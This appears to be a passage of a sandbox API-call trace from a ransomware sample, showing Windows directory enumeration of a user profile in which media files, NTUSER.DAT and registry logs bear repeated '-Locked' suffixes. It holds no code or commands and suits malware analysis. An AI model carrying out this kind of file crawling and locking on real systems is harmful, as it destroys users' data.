FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39ffe4b2, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x39ffe4b2, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39ffe4b2, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="YZL8R176sHB.swf-Locked-Locked-Locked", cAlternateFileName="YZL8R1~2.SWF")) returned 0 [0311.462] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0311.462] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BGQh9XM98-F_E sIj\\*.*", lpFindFileData=0x1aef34 | out: lpFindFileData=0x1aef34*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef57e570, ftCreationTime.dwHighDateTime=0x1d7dc48, ftLastAccessTime.dwLowDateTime=0x3a00805f, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3a00805f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0311.463] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef57e570, ftCreationTime.dwHighDateTime=0x1d7dc48, ftLastAccessTime.dwLowDateTime=0x3a00805f, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3a00805f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0311.463] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39f9de41, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x39f9de41, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39f9de41, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="E ZB4hlMv59fpDjUh6qT.m4a-Locked-Locked-Locked", cAlternateFileName="EZB4HL~2.M4A")) returned 1 [0311.463] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39fc0063, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x39fc0063, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39fc0063, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="eKq_zA-WA.mkv-Locked-Locked-Locked", cAlternateFileName="EKQ_ZA~2.MKV")) returned 1 [0311.464] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39fcc3b1, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x39fcc3b1, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39fcc3b1, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="iTP31jJvGR0dsUQ.wav-Locked-Locked-Locked", cAlternateFileName="ITP31J~2.WAV")) returned 1 [0311.464] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39fd8719, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x39fd8719, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39fd8719, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ixYbal.avi-Locked-Locked-Locked", cAlternateFileName="IXYBAL~1.AVI")) returned 1 [0311.464] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39fe37df, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x39fe37df, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39fe37df, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S sEwkyDOda_C3BxCH.ppt-Locked-Locked-Locked", cAlternateFileName="SSEWKY~2.PPT")) returned 1 [0311.468] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39ff0e77, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x39ff0e77, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39ff0e77, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ujk4snw9z16p4ofDz.mp4-Locked-Locked-Locked", cAlternateFileName="UJK4SN~2.MP4")) returned 1 [0311.468] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39ffe4b2, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x39ffe4b2, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39ffe4b2, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="YZL8R176sHB.swf-Locked-Locked-Locked", cAlternateFileName="YZL8R1~2.SWF")) returned 1 [0311.468] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0311.468] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0311.469] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af1d0) returned 1 [0311.469] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af1dc) returned 1 [0311.469] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af210) returned 1 [0311.469] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\", nBufferLength=0x105, lpBuffer=0x1aed18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\", lpFilePart=0x0) returned 0x16 [0311.469] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\", nBufferLength=0x105, lpBuffer=0x1aecec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\", lpFilePart=0x0) returned 0x16 [0311.470] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\*.*", lpFindFileData=0x1aef38 | out: lpFindFileData=0x1aef38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3456e292, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3456e292, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0311.470] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0311.471] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\*", lpFindFileData=0x1aeef4 | out: lpFindFileData=0x1aeef4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3456e292, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3456e292, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0311.471] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3456e292, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3456e292, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0311.472] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0311.472] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0311.472] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x435fd682, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x34666b77, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34666b77, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Contacts", cAlternateFileName="")) returned 1 [0311.472] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0311.473] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x39f9b77d, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39f9b77d, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0311.473] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x36b6417e, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36b6417e, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0311.473] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x36c70a86, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36c70a86, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0311.473] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x34c1b5fa, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34c1b5fa, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0311.474] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x34cb35ca, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34cb35ca, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0311.474] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0311.474] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3513d0c1, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3513d0c1, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0311.474] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d374e80, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d374e80, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d374e80, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0311.475] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1 [0311.475] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x3ce3dbd0, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xf3d0952f, ftLastAccessTime.dwHighDateTime=0x1d7e768, ftLastWriteTime.dwLowDateTime=0xf3d0952f, ftLastWriteTime.dwHighDateTime=0x1d7e768, nFileSizeHigh=0x0, nFileSizeLow=0x180000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0311.475] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32d4f49d, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32d4f49d, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34507af7, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT-Locked", cAlternateFileName="NTUSER~1.DAT")) returned 1 [0311.476] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3450efd6, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3450efd6, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3450efd6, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT-Locked-Locked", cAlternateFileName="NTUSER~2.DAT")) returned 1 [0311.476] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3d2dc444, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d2dc444, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d2dc444, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x59400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0311.476] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34532582, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x34532582, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34532582, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG1-Locked", cAlternateFileName="NTUSER~3.LOG")) returned 1 [0311.477] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3d2dc444, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d2dc444, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d2dc444, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x84000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0311.477] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3453af3e, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3453af3e, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3453af3e, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG2-Locked", cAlternateFileName="NTUSER~4.LOG")) returned 1 [0311.477] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3d2dc444, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d2dc444, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x63434853, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0311.477] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x345437ce, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x345437ce, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x345437ce, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TM.blf-Locked", cAlternateFileName="NTUSER~2.BLF")) returned 1 [0311.478] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3d3026e1, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d3026e1, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6340e659, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0311.478] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3454ac95, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3454ac95, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3454ac95, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000001.regtrans-ms-Locked", cAlternateFileName="NTUSER~3.REG")) returned 1 [0311.478] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3d3026e1, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d3026e1, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6340e659, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0311.479] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x345583f1, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x345583f1, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x345583f1, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000002.regtrans-ms-Locked", cAlternateFileName="NTUSER~4.REG")) returned 1 [0311.481] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.ini", cAlternateFileName="")) returned 1 [0311.481] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3456e292, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3456e292, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3456e292, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.ini-Locked", cAlternateFileName="NTUSER~1.INI")) returned 1 [0311.481] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x84ac775d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x35369ed2, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35369ed2, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OneDrive", cAlternateFileName="")) returned 1 [0311.481] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x36cc894d, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36cc894d, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0311.482] 